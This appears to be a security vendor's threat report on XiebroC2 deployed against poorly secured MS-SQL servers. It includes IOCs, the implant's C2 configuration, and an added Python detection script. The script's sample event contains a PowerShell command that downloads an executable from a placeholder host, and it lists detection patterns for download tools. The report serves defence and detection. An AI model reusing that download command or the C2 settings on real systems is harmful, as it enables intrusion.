XiebroC2 Identified in MS-SQL Server Attack Cases


AhnLab SEcurity intelligence Center (ASEC) monitors attacks targeting poorly managed MS-SQL servers and recently confirmed a case involving the use of XiebroC2. XiebroC2 is a C2 framework with open-source code that supports various features such as information collection, remote control, and defense evasion, similar to CobaltStrike. [1]

Figure 1. XiebroC2’s GitHub page


1. Attack Case

The attacked system was exposed to the internet and is suspected of using weak credentials. Multiple malware installation attempts had already been identified on this system, and a CoinMiner was among the malware used, as in other attack cases against MS-SQL servers.

After successfully logging in, the threat actor installed JuicyPotato. Note that even when the process responsible for the MS-SQL service is made to run the threat actor’s commands through a vulnerability or an inappropriate configuration, that process runs with low privileges by default. Malware executed with the privileges of that process is therefore also limited in the additional malicious behaviors it can perform. For this reason, threat actors often use Potato-family malware, which escalates privileges by abusing certain privileges held in the token of the account under which the current process is running.

After installing JuicyPotato, XiebroC2 was downloaded using PowerShell.

Figure 2. MS-SQL service downloading XiebroC2
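The chain described above (sqlservr.exe spawning PowerShell that fetches a remote file, and a tool dropped to a user-writable directory) can be triaged from process-creation telemetry. The following is an added example and not code from the ASEC report; the events, file names and the 203.0.113.5 address are constructed samples in Sysmon Event ID 1 field names.

```python
import re

# Constructed Sysmon-style process-creation events (illustrative samples, not
# telemetry from the report). 203.0.113.5 is a documentation address.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -c "Invoke-WebRequest http://203.0.113.5:2780/t.exe -OutFile C:\ProgramData\t.exe"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\ProgramData\t.exe",          # dropped binary (Potato-style tool)
     "CommandLine": r"C:\ProgramData\t.exe"},
    {"ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\SQLDumper.exe",
     "CommandLine": "SQLDumper.exe"},           # benign: SQL Server's own helper
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c Get-Process"},  # benign interactive use
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD_CUES = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|"
                           r"start-bitstransfer|certutil.*-urlcache|bitsadmin|\bcurl\b|\bwget\b", re.I)
URL_RE = re.compile(r"https?://\S+", re.I)
WRITABLE_PATHS = re.compile(r"^[a-z]:\\(programdata|users\\public|windows\\temp|"
                            r"users\\[^\\]+\\appdata\\local\\temp)\\", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return (severity, reasons) for one event: 0 = nothing notable, 1 = review, 2 = high."""
    reasons = []
    parent, image, cmd = basename(ev["ParentImage"]), basename(ev["Image"]), ev.get("CommandLine", "")
    sql_parent = parent == "sqlservr.exe"
    if sql_parent and image in SHELLS:
        reasons.append("sqlservr.exe spawned a shell or script host")
    if DOWNLOAD_CUES.search(cmd) and URL_RE.search(cmd):
        reasons.append("command line fetches a remote resource")
    if WRITABLE_PATHS.search(ev["Image"]):
        reasons.append("binary runs from a user-writable directory")
    # Two cues rooted at the database engine is the pattern from this case; one cue alone is worth a look.
    severity = 2 if sql_parent and len(reasons) >= 2 else (1 if reasons else 0)
    return severity, reasons

def triage(events):
    """Return [(index, severity, reasons)] for every event scoring above 0."""
    return [(i, *score_event(ev)) for i, ev in enumerate(events) if score_event(ev)[0] > 0]
```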


2. XiebroC2

XiebroC2 is a C2 framework similar to CobaltStrike, and its source code is publicly available. The Implant, which is responsible for the backdoor features, is written in Go and supports multiple platforms, including Windows, Linux, and macOS. Threat actors can use XiebroC2 installed on infected systems to utilize features such as remote control, reverse shell, file and process management, network monitoring, reverse proxy, and taking screenshots.

Figure 3. XiebroC2 panel (GitHub)

XiebroC2 contains the following configuration information. After execution, it collects information such as the PID, HWID, computer name, and username, then connects to the C&C server and executes the commands it receives from the threat actor.

  • HostPort = “1.94.185[.]235:8433”
  • Protocol = “Session/Reverse_Ws”
  • ListenerName = “test2”
  • AesKey = “QWERt_CSDMAHUATW”

Figure 4. Information collected by XiebroC2


3. Conclusion

The two main types of attacks against MS-SQL servers are brute force and dictionary attacks, usually targeting systems with poorly managed account credentials. Administrators are advised to use complex, difficult-to-guess passwords and change them regularly to protect their database servers from brute force and dictionary attacks.

V3 should also be kept up-to-date to prevent malware infection. Furthermore, security measures such as firewalls should be employed to restrict access by external threat actors to database servers that are publicly accessible. Failure to implement these measures may result in continuous infection by threat actors and malware.


MD5

4cfdd0ae14185e72a74e67717c23526c
7d28a709a6ca6eef5af40f48cf7e3d12

URL

http[:]//183[.]196[.]14[.]213[:]2780/tee[.]exe

IP

1[.]94[.]185[.]235

Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP.